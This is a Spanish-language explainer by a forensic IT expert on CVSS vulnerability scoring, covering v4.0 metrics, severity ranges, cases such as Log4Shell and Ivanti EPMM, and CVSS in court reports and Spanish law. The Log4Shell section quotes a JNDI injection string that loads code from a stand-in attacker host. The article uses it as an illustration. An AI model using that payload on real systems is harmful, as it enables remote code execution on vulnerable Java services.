Seguridad

CVSS (Common Vulnerability Scoring System)

Estándar abierto que asigna una puntuación de 0 a 10 a las vulnerabilidades de software según su gravedad, impacto y facilidad de explotación. Una puntuación CVSS 9.0+ indica vulnerabilidad crítica con explotación remota sin autenticación.

19 min de lectura

CVSS 9.8: dos numeros que tumbaron la Comision Europea. En enero de 2026, dos vulnerabilidades criticas en Ivanti Endpoint Manager Mobile (EPMM) con puntuacion CVSS 9.8 cada una (CVE-2026-1281 y CVE-2026-1340) permitieron a atacantes comprometer la infraestructura de la Comision Europea sin necesidad de autenticacion. Cuatro anos antes, Log4Shell (CVE-2021-44228) alcanzo la puntuacion maxima de CVSS 10.0, afectando a mas de 35.000 paquetes Java, el 8% de todo el repositorio Maven Central, y costando a las organizaciones afectadas mas de 10.000 millones de dolares en remediacion. Detras de estas cifras hay un sistema que traduce la complejidad tecnica de las vulnerabilidades en un numero universal: el CVSS (Common Vulnerability Scoring System), el estandar que permite a un perito informatico explicar a un juez, en un solo dato, por que una brecha de seguridad era critica y prevenible.

Definicion tecnica de CVSS

El CVSS (Common Vulnerability Scoring System) es un estandar abierto y gratuito desarrollado por el Forum of Incident Response and Security Teams (FIRST) que proporciona una puntuacion numerica de 0.0 a 10.0 para evaluar la gravedad de las vulnerabilidades de seguridad informatica. Actualmente en su version 4.0 (publicada en noviembre de 2023), el CVSS se ha convertido en el lenguaje universal de la industria para comunicar la severidad de fallos de seguridad.

A diferencia de una evaluacion subjetiva, el CVSS utiliza un conjunto de metricas objetivas y reproducibles que cualquier profesional de ciberseguridad puede calcular de forma independiente, obteniendo la misma puntuacion. Esto lo convierte en una herramienta imprescindible para informes periciales forenses, donde la objetividad es requisito fundamental.

Dato clave

Mas del 94% de las organizaciones que gestionan vulnerabilidades utilizan CVSS como metrica principal de priorizacion, segun el informe State of Vulnerability Management 2025 de Qualys. En Espana, el Centro Criptologico Nacional (CCN-CERT) y el INCIBE utilizan CVSS como estandar en todos sus avisos de seguridad.

El CVSS no mide el riesgo total de una vulnerabilidad para una organizacion concreta: mide la gravedad tecnica intrinseca. El riesgo real depende ademas del contexto de cada organizacion: que sistemas estan expuestos, que datos procesan y que controles compensatorios existen.


Metricas CVSS v4.0: como se calcula la puntuacion

La version 4.0 del CVSS introduce mejoras significativas respecto a la v3.1, incluyendo nuevos grupos de metricas y mayor granularidad. El sistema se estructura en cuatro grupos principales de metricas:

Grupo 1: Metricas Base (Base Score)

Las metricas base representan las caracteristicas intrinsecas de la vulnerabilidad que no cambian con el tiempo ni dependen del entorno. Son las mas importantes y las unicas obligatorias para calcular una puntuacion CVSS.

MetricaValores posiblesQue mide
Vector de ataque (AV)Network, Adjacent, Local, PhysicalComo puede acceder el atacante al componente vulnerable
Complejidad de ataque (AC)Low, HighCondiciones adicionales necesarias para explotar la vulnerabilidad
Requisitos de ataque (AT)None, PresentCondiciones previas del sistema vulnerable (nuevo en v4.0)
Privilegios requeridos (PR)None, Low, HighNivel de acceso previo necesario para explotar la vulnerabilidad
Interaccion del usuario (UI)None, Passive, ActiveSi la victima debe realizar alguna accion (v4.0 distingue pasiva/activa)
Impacto en confidencialidad (VC/SC)None, Low, HighPerdida de confidencialidad en el sistema vulnerable y sistemas posteriores
Impacto en integridad (VI/SI)None, Low, HighModificacion no autorizada de datos
Impacto en disponibilidad (VA/SA)None, Low, HighPerdida de acceso a recursos del sistema

Grupo 2: Metricas de Amenaza (Threat Metrics)

Reflejan el estado actual de explotacion de la vulnerabilidad. En CVSS v4.0, estas metricas sustituyen a las anteriores “Temporal Metrics” de la v3.1.

MetricaValoresQue mide
Madurez del exploit (E)Not Defined, Attacked, POC, UnreportedSi existe exploit disponible y si hay ataques activos documentados

Grupo 3: Metricas Ambientales (Environmental Metrics)

Permiten ajustar la puntuacion al contexto especifico de una organizacion. Son clave para la priorizacion interna.

MetricaQue ajusta
Requisitos de confidencialidad (CR)Importancia de la confidencialidad para el activo afectado
Requisitos de integridad (IR)Importancia de la integridad para el activo
Requisitos de disponibilidad (AR)Importancia de la disponibilidad para el activo
Metricas base modificadasSobreescritura de metricas base segun el entorno

Grupo 4: Metricas Suplementarias (Supplemental Metrics) - Nuevo en v4.0

MetricaQue describe
Automatizable (Automatable)Si el ataque se puede automatizar (gusano)
Recuperacion (Recovery)Capacidad del sistema de recuperarse tras la explotacion
Densidad de valor (Value Density)Riqueza de datos accesibles por el atacante
Esfuerzo de respuesta (Response Effort)Recursos necesarios para responder al incidente
Urgencia del proveedor (Provider Urgency)Evaluacion de urgencia del propio fabricante
CVSS v4.0 vs v3.1

Muchas organizaciones y bases de datos (incluida la NVD del NIST) aun utilizan CVSS v3.1. Durante el periodo de transicion (2024-2026), un perito forense debe especificar siempre que version de CVSS esta citando en su informe pericial. Las puntuaciones v3.1 y v4.0 para la misma vulnerabilidad pueden diferir ligeramente.


Escala de severidad CVSS: que significa cada rango

La puntuacion numerica se traduce en una escala cualitativa de severidad que facilita la comunicacion con audiencias no tecnicas, como jueces, abogados y directivos:

RangoSeveridadPlazo de parcheado recomendadoEjemplo realCVSS
0.0NingunaNo requiere accionVulnerabilidad teorica sin impacto0.0
0.1 - 3.9BajaParchear en ciclo normal (90 dias)Divulgacion limitada de informacion no sensible3.1
4.0 - 6.9MediaParchear en 30 diasXSS reflejado que requiere interaccion del usuario5.4
7.0 - 8.9AltaParchear en 7 diasEternalBlue (CVE-2017-0144): ejecucion remota en Windows SMB8.1
9.0 - 10.0CriticaParchear en 24-72 horasLog4Shell (CVE-2021-44228): ejecucion remota sin autenticacion10.0
Regla practica para informes periciales

En un informe pericial, una vulnerabilidad CVSS 9.0+ sin parchear durante mas de 30 dias tras la publicacion del parche se considera generalmente negligencia grave. Para vulnerabilidades CVSS 7.0-8.9, el margen razonable es de 7-14 dias. Para CVSS 4.0-6.9, hasta 30 dias se considera aceptable segun los estandares de la industria (CISA, ENISA, CCN-CERT).


Vulnerabilidades historicas con CVSS: casos reales

El CVSS cobra significado real cuando se aplica a vulnerabilidades que han causado danos medibles. Esta tabla recoge cuatro de las vulnerabilidades mas impactantes de la historia reciente, con su puntuacion CVSS y consecuencias:

VulnerabilidadCVECVSSAnoVector de ataqueImpacto real
Log4ShellCVE-2021-4422810.02021Red, sin autenticacion, sin interaccion35.000+ paquetes Java afectados. Coste de remediacion superior a 10.000M$. Explotacion activa a las 24 horas de publicacion
Ivanti EPMMCVE-2026-1281 / CVE-2026-13409.82026Red, sin autenticacion, sin interaccionComprometio la infraestructura de la Comision Europea. Acceso completo a dispositivos moviles gestionados
EternalBlueCVE-2017-01448.12017Red, complejidad altaUsado por WannaCry y NotPetya. Paralizo hospitales (NHS), logistica (Maersk, 300M$ perdidas), telecomunicaciones
HeartbleedCVE-2014-01607.52014Red, sin autenticacion17% de servidores web con SSL afectados. Filtracion de claves privadas, credenciales y datos sensibles de memoria

Analisis detallado: Log4Shell (CVSS 10.0)

Log4Shell es el ejemplo paradigmatico de lo que significa una puntuacion CVSS maxima. Cada metrica base contribuyo a la puntuacion perfecta de 10.0:

MetricaValorJustificacion
Vector de ataqueNetworkExplotable remotamente a traves de la red
ComplejidadLowSin condiciones especiales, trivial de explotar
PrivilegiosNoneNo se necesita ningun acceso previo
Interaccion usuarioNoneLa victima no necesita hacer nada
Impacto confidencialidadHighAcceso total a datos del sistema
Impacto integridadHighModificacion completa de datos y sistema
Impacto disponibilidadHighDenegacion completa del servicio

La consecuencia: cualquier aplicacion Java que usara la biblioteca Log4j y recibiera input de usuario (practicamente todas) podia ser comprometida remotamente con una simple cadena de texto como ${jndi:ldap://atacante.com/exploit}. La puntuacion CVSS 10.0 comunicaba de forma inequivoca: parchea ahora o seras comprometido.

Analisis detallado: Ivanti EPMM (CVSS 9.8) - Caso Comision Europea 2026

En enero de 2026, investigadores de seguridad descubrieron que dos vulnerabilidades criticas en Ivanti Endpoint Manager Mobile (EPMM) habian sido explotadas para comprometer la infraestructura de la Comision Europea. La puntuacion CVSS 9.8 (no 10.0) se debio a un unico factor:

MetricaValorPor que no fue 10.0
Vector de ataqueNetworkExplotable remotamente
ComplejidadLowTrivial de explotar
PrivilegiosNoneSin autenticacion previa
Interaccion usuarioNoneSin interaccion
AlcanceUnchangedImpacto limitado al componente vulnerable (sin propagacion automatica)

La diferencia entre CVSS 9.8 y 10.0 es tecnica (el alcance), pero en terminos practicos ambas puntuaciones exigen remediacion inmediata. Un perito forense que documente una brecha causada por una vulnerabilidad CVSS 9.8 sin parchear tiene un argumento solido de negligencia.


CVSS en investigaciones forenses: aplicacion practica

Para un perito informatico, el CVSS es una herramienta fundamental que traduce complejidad tecnica en un dato que jueces, abogados y aseguradoras pueden comprender. Su uso en investigaciones forenses abarca multiples dimensiones:

Escenarios donde el CVSS es determinante

Escenario forenseRol del CVSSImpacto en el caso
Brecha de datos con negligenciaCuantifica la gravedad de la vulnerabilidad no parcheadaDetermina si la organizacion actuo con diligencia
Reclamacion de ciberseguroDemuestra si la vulnerabilidad era conocida y parcheadaLa aseguradora puede denegar cobertura si CVSS alto y parche disponible
Sancion AEPD/RGPDEvidencia si las medidas de seguridad eran “adecuadas al riesgo”Agravante si CVSS critico sin parchear, atenuante si zero-day
Responsabilidad de proveedorEvalua si el software entregado cumplia estandares de seguridadCVSS alto en producto vendido puede ser incumplimiento contractual
Peritaje tras ransomwareIdentifica el vector de entrada y su gravedad objetivaCVSS 9.0+ sin parchear = evidencia de negligencia en informe pericial
El CVSS como lenguaje comun en sala

Cuando un perito declara ante un tribunal que “la vulnerabilidad explotada tenia una puntuacion CVSS de 9.8 sobre 10, clasificada como critica por el estandar internacional utilizado por FIRST, el NIST y el CCN-CERT”, proporciona al juez un dato objetivo, estandarizado e internacionalmente reconocido que trasciende la jerga tecnica.


Pasos del analisis forense con CVSS

  1. Identificar la vulnerabilidad explotada

    Mediante el analisis de logs, trafico de red, memoria y artefactos del sistema, el perito identifica el CVE especifico que fue explotado. Herramientas como Nessus, OpenVAS o el analisis manual de exploits permiten correlacionar los indicadores de compromiso (IOCs) con vulnerabilidades conocidas.

  2. Obtener la puntuacion CVSS oficial

    Consultar la puntuacion en la National Vulnerability Database (NVD) del NIST o en la base de datos de FIRST. Registrar tanto la puntuacion CVSS Base como la version utilizada (v3.1 o v4.0). Si existen diferencias entre ambas versiones, documentar las dos.

  3. Documentar el timeline critico

    Establecer la cronologia completa: fecha de descubrimiento de la vulnerabilidad, fecha de asignacion del CVE, fecha de publicacion del parche por el fabricante, fecha de aviso por organismos oficiales (CISA KEV, CCN-CERT, INCIBE), y fecha del ataque. El intervalo entre la disponibilidad del parche y el ataque es la metrica clave para evaluar diligencia.

  4. Evaluar el estado de parcheado de la victima

    Verificar las versiones de software instaladas en los sistemas comprometidos. Comprobar el historial de actualizaciones (Windows Update, apt logs, registros de gestion de parches). Documentar si existia un proceso formal de gestion de vulnerabilidades.

  5. Calcular el CVSS ambiental ajustado

    Aplicar las metricas ambientales al contexto de la organizacion victima. Un hospital con datos de salud (requisito de confidencialidad alto) tendra un CVSS ambiental superior al base si la vulnerabilidad afecta a la confidencialidad. Un sistema de control industrial (requisito de disponibilidad alto) tendra un CVSS ambiental mayor si la vulnerabilidad afecta a la disponibilidad.

  6. Elaborar la conclusion pericial con CVSS como soporte

    Redactar las conclusiones utilizando el CVSS como metrica objetiva. Ejemplo: “La vulnerabilidad CVE-2026-XXXX, con puntuacion CVSS 9.8 (critica), permanecio sin parchear durante 45 dias tras la publicacion del parche. Segun los estandares de la industria (CISA, ENISA), el plazo razonable de parcheado para vulnerabilidades criticas es de 24-72 horas. El incumplimiento de este estandar constituye, a criterio de este perito, una falta de diligencia en la gestion de la seguridad informatica.”


El CVSS no es mencionado explicitamente en la legislacion espanola, pero su relevancia juridica es indirecta y creciente a traves de multiples marcos normativos:

RGPD (Reglamento General de Proteccion de Datos)

El articulo 32 del RGPD exige “medidas tecnicas y organizativas apropiadas para garantizar un nivel de seguridad adecuado al riesgo”. El CVSS proporciona la metrica objetiva para evaluar si las medidas eran “adecuadas”:

  • CVSS 9.0-10.0 sin parchear: La AEPD puede considerar que la organizacion no implemento medidas adecuadas al riesgo conocido
  • Parche disponible y no aplicado: Agravante en procedimiento sancionador
  • Zero-day: Atenuante, ya que la organizacion no tenia forma de conocer ni remediar la vulnerabilidad

La AEPD ha impuesto sanciones superiores a 500.000 EUR en casos donde las organizaciones no parchearon vulnerabilidades criticas conocidas que derivaron en brechas de datos personales.

Directiva NIS2 (transpuesta como RDL 7/2025)

La NIS2 exige a entidades esenciales e importantes que implementen “politicas de analisis de riesgos y seguridad de los sistemas de informacion” (Art. 21). Esto incluye:

  • Gestion de vulnerabilidades con priorizacion basada en CVSS
  • Pentesting periodico que utiliza CVSS para clasificar hallazgos
  • Notificacion de incidentes que involucren vulnerabilidades criticas

Codigo Penal: diligencia y responsabilidad

En el ambito penal, el CVSS es util para determinar:

Concepto legalComo contribuye el CVSS
Diligencia debidaDemuestra si la organizacion conocia la gravedad del riesgo
Negligencia grave (Art. 264 CP)CVSS critico sin parchear puede evidenciar negligencia en proteccion de datos
Responsabilidad del fabricanteCVSS alto en producto sin parche puede indicar defecto en seguridad
AtenuanteCVSS bajo o vulnerabilidad zero-day pueden atenuar responsabilidad de la victima

Ciberseguros y CVSS

Las polizas de ciberseguro cada vez incluyen clausulas mas especificas relacionadas con la gestion de vulnerabilidades:

Clausula tipica de polizaRelacion con CVSS
”Mantener sistemas actualizados con parches criticos”CVSS 9.0+ define que es “critico"
"Aplicar parches de seguridad en plazo razonable”CVSS determina la urgencia del plazo
”Exclusion por vulnerabilidad conocida no parcheada”La fecha del CVE y el CVSS prueban el conocimiento
Tendencia en ciberseguros

Desde 2024, las principales aseguradoras espanolas (Mapfre, AXA, Zurich) incluyen requisitos explicitos de gestion de vulnerabilidades en sus polizas ciber. Un informe pericial que demuestre CVSS 9.0+ sin parchear durante mas de 30 dias puede ser determinante para que la aseguradora deniegue la cobertura del siniestro.


Limitaciones del CVSS y metricas complementarias

El CVSS, pese a ser el estandar mas utilizado, tiene limitaciones que un perito forense debe conocer:

LimitacionExplicacionMetrica complementaria
No mide el riesgo realCVSS mide gravedad tecnica, no probabilidad de explotacionEPSS (Exploit Prediction Scoring System)
No considera el contextoSin metricas ambientales, ignora el entorno de la organizacionSSVC (Stakeholder-Specific Vulnerability Categorization) de CISA
Puntuacion estaticaLa puntuacion base no cambia, aunque aparezcan exploitsCVSS Threat Metrics + CISA KEV
Fatiga de alertasDemasiadas vulnerabilidades “criticas” complican la priorizacionEPSS filtra vulnerabilidades con alta probabilidad de explotacion real

EPSS (Exploit Prediction Scoring System): Desarrollado por FIRST (el mismo organismo detras de CVSS), EPSS calcula la probabilidad de que una vulnerabilidad sea explotada en los proximos 30 dias, en una escala de 0 a 1. Un perito forense puede combinar CVSS (gravedad) con EPSS (probabilidad) para un analisis de riesgo mas completo en su informe pericial.


Herramientas para calcular y consultar CVSS

HerramientaFuncionAcceso
NVD (NIST)Base de datos oficial con puntuaciones CVSS para todos los CVEGratuito: nvd.nist.gov
FIRST CVSS CalculatorCalculadora oficial interactiva para CVSS v4.0 y v3.1Gratuito: first.org/cvss/calculator
CVE.orgBase de datos de CVE gestionada por MITREGratuito: cve.org
CISA KEVCatalogo de vulnerabilidades explotadas activamenteGratuito: cisa.gov/known-exploited-vulnerabilities
Nessus / OpenVASEscaneres de vulnerabilidades que calculan CVSS automaticamenteComercial / Open-source
CCN-CERT (Espana)Avisos de seguridad con puntuaciones CVSS para administracion publicaGratuito: ccn-cert.cni.es

Preguntas frecuentes

Que significa una puntuacion CVSS de 9.8?

Una puntuacion CVSS de 9.8 sobre 10 indica una vulnerabilidad critica que cumple casi todas las condiciones de maxima gravedad: es explotable remotamente a traves de la red (vector Network), con complejidad baja, sin necesidad de autenticacion ni privilegios previos, y sin requerir ninguna interaccion del usuario. El impacto en confidencialidad, integridad y disponibilidad es alto.

La razon por la que alcanza 9.8 y no 10.0 suele ser el parametro de “Alcance” (Scope): en CVSS 9.8, el impacto se limita al componente vulnerable, mientras que en CVSS 10.0 (como Log4Shell), la explotacion puede afectar a componentes mas alla del sistema vulnerable.

Ejemplos recientes con CVSS 9.8: las vulnerabilidades CVE-2026-1281 y CVE-2026-1340 en Ivanti EPMM que comprometieron la Comision Europea en enero de 2026, y CVE-2024-21762 en FortiOS que fue explotada masivamente para desplegar ransomware.

Como se calcula la puntuacion CVSS?

El calculo de CVSS se realiza mediante una formula matematica que combina las metricas base. El proceso es el siguiente:

  1. Evaluar cada metrica base: Para cada una de las 8+ metricas (vector de ataque, complejidad, privilegios, interaccion del usuario, impacto en CIA), se selecciona el valor que describe la vulnerabilidad
  2. Asignar pesos numericos: Cada valor tiene un peso predefinido por el estandar (por ejemplo, AV:Network = 0.85, AV:Local = 0.55)
  3. Calcular sub-puntuaciones: Se combinan los pesos de explotabilidad (AV, AC, PR, UI) y los de impacto (C, I, A) en sub-puntuaciones
  4. Aplicar la formula final: La formula combina las sub-puntuaciones con un factor de ajuste por alcance (Scope), produciendo un numero entre 0.0 y 10.0
  5. Redondear al decimal superior: El resultado se redondea a un decimal

En la practica, la mayoria de los profesionales utilizan la calculadora oficial de FIRST o las puntuaciones ya asignadas por el NIST en la NVD, en lugar de calcular manualmente. Lo importante para un perito forense es entender que significa cada metrica y como impacta en la puntuacion final, para poder explicarlo ante un tribunal.

Por que es importante el CVSS en un informe pericial forense?

El CVSS aporta cuatro valores fundamentales a un informe pericial:

  1. Objetividad: La puntuacion es calculada mediante un estandar internacional publico, no es una opinion subjetiva del perito. Cualquier otro profesional puede verificar independientemente la puntuacion
  2. Universalidad: El CVSS es comprendido por la industria de ciberseguridad a nivel mundial. Cuando un perito cita CVSS 9.8, cualquier experto en cualquier pais entiende exactamente la gravedad
  3. Comprensibilidad judicial: Un juez sin conocimientos tecnicos puede entender “9.8 sobre 10, clasificado como critico”. Es infinitamente mas claro que explicar vectores de ataque, buffers overflow o inyecciones de codigo
  4. Determinacion de diligencia: El CVSS, combinado con la fecha de publicacion del parche y la fecha del ataque, permite establecer de forma objetiva si la organizacion victima actuo con la diligencia debida o fue negligente

En procedimientos judiciales espanoles, el CVSS se ha utilizado como soporte probatorio en casos de reclamaciones de ciberseguros, sanciones de la AEPD por brechas de datos, y procedimientos penales por danos informaticos donde se evalua la concurrencia de negligencia en la proteccion de sistemas.


Conceptos relacionados

  • CVE (Vulnerabilidades) - El sistema de identificacion de vulnerabilidades cuya gravedad mide el CVSS
  • Zero-Day - Vulnerabilidades sin parche cuyo CVSS suele ser alto por la ausencia de mitigaciones
  • Pentesting - Los informes de pentesting clasifican hallazgos por puntuacion CVSS
  • IOCs (Indicadores de Compromiso) - Los IOCs se correlacionan con CVEs que tienen puntuaciones CVSS asignadas
  • Analisis Forense Digital - Disciplina donde el CVSS contextualiza la gravedad de las vulnerabilidades explotadas

Referencias y fuentes

  1. FIRST - “Common Vulnerability Scoring System v4.0 Specification”. first.org/cvss/v4.0/specification-document

  2. NIST - “National Vulnerability Database (NVD)”. nvd.nist.gov

  3. EUobserver - “EU Commission hack linked to Ivanti EPMM vulnerabilities (CVE-2026-1281, CVE-2026-1340), CVSS 9.8”. euobserver.com

  4. Apache Foundation - “Apache Log4j Security Vulnerabilities - CVE-2021-44228, CVSS 10.0”. logging.apache.org/log4j/2.x/security

  5. Qualys - “State of Vulnerability Management 2025: CVSS adoption exceeds 94%”. qualys.com

  6. CISA - “Known Exploited Vulnerabilities Catalog”. cisa.gov/known-exploited-vulnerabilities-catalog

  7. CCN-CERT - “Avisos de seguridad del Centro Criptologico Nacional”. ccn-cert.cni.es

  8. RGPD - Reglamento (UE) 2016/679, Art. 32 sobre seguridad del tratamiento. eur-lex.europa.eu

  9. NIS2 - Directiva (UE) 2022/2555, Art. 21 sobre medidas de gestion de riesgos de ciberseguridad. eur-lex.europa.eu

  10. FIRST - “Exploit Prediction Scoring System (EPSS)”. first.org/epss

  11. Maersk - “NotPetya attack: $300M in losses from unpatched EternalBlue (CVSS 8.1)”. Comunicado corporativo 2017.


Ultima actualizacion: Febrero 2026 Categoria: Seguridad Codigo: SEG-022

Preguntas Frecuentes

¿Qué significa una puntuación CVSS de 9.8?

Una puntuación CVSS de 9.8 sobre 10 indica una vulnerabilidad crítica que permite ejecución remota de código sin autenticación previa, a través de la red, sin interacción del usuario. Ejemplo: las vulnerabilidades CVE-2026-1281 y CVE-2026-1340 en Ivanti EPMM que comprometieron la Comisión Europea en enero de 2026 tenían CVSS 9.8.

¿Cómo se calcula la puntuación CVSS?

CVSS v4.0 evalúa múltiples métricas: vector de ataque (red/local), complejidad, privilegios requeridos, interacción del usuario, impacto en confidencialidad/integridad/disponibilidad, y alcance. La combinación genera una puntuación de 0 a 10: Bajo (0.1-3.9), Medio (4.0-6.9), Alto (7.0-8.9), Crítico (9.0-10.0).

¿Por qué es importante el CVSS en un informe pericial forense?

El CVSS permite al perito informático cuantificar objetivamente la gravedad de la vulnerabilidad explotada en un incidente. En informes periciales para tribunales, el CVSS proporciona una métrica estándar internacional que los jueces pueden entender: 'la vulnerabilidad explotada tenía una gravedad de 9.8 sobre 10, clasificada como crítica por el estándar internacional CVSS'.

¿Necesitas un peritaje forense?

Si necesitas ayuda profesional con análisis forense digital, estoy aquí para ayudarte.

Solicitar Consulta Gratuita
Jonathan Izquierdo

Jonathan Izquierdo · Perito Forense

+15 años experiencia · AWS Certified

WhatsApp